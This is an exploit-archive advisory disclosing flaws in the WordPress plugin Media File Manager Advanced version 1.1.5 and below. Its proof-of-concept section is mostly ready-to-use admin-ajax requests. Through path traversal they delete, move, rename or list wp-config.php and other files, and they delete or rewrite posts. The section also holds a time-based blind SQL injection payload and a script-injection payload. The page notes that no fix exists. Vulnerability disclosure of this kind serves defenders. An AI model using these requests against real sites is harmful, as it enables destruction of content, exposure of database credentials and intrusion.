WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection: Posted May 14, 2015; Authored by Evex; WordPress Media File Manager Advanced plugin versions 1.1.5 and below suffer from cross site scripting, various modification, and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 4166675e925816acdce6d734916fadfe5a205ce3a81f8404d06202ad9247bc71; Download | Favorite | View

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Description

"media-file-manager-advanced" suffers from executing administrator actions
by any authenticated user due to weak permissions checking.
an attacker can delete/update posts, Creating/Removing/Listing Directories,
Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site
Scripting.

Homepage

https://wordpress.org/plugins/media-file-manager-advanced/

Affected Version

<= 1.1.5

Description

Vulnerability Scope


LFD,SQL,XSS,Site Ruining and Changing of Content.

Authorization Required

User

Proof of Concept


Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER

RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER

UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

no more wp-config.php

Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Sleeps for 10 seconds

XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

Alerts(1)

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

now wp-config.php is in /wp-content/uploads/wp-config.php


Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

now wp-config.php is renamed to wp-config.txt

Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

will list all files and directories

Fix

No Fix Available at The Moment.

Time line

Notified Vendor - No Reply
Publish Disclosure

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Share This

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems